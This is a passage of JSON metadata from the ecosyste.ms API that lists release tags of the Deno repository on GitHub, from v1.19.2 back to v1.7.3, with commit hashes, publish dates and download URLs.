pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts